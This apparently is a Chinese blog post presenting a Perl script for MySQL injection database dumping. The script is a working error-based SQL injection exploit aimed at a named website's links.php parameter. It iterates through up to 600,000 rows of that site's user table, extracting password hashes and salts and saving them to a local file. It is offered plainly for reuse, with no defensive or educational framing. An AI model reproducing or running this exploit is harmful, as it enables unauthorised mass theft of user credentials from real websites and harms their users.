mysql脚本注入_mysql注入导库脚本

#!/usr/bin/perl -w

#改版权不得好死...

#转载须注明

#语法 自己改改

use strict;

use LWP::Simple;

use utf8;

$|++;

my $count = 1;

for ($count = 1; $count <= 600_000; $count++) {

print 'ID: ', $count, "\n";

my $url = 'http://www.wowguru.com/links.php?out=2 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x5e24,0x7c,password,0x3A,salt,0x245e) FROM `wowguru_db`.user LIMIT%20' . $count . ',1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1';

#print "$url\n";

my $content = get($url);

while ($content =~ m|\^\$(.+?)\$\^|igs) {

open FILE, ">>", "password.txt" or die $!;

print "$1\n";

print FILE "$1\n";

close FILE;

}

}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值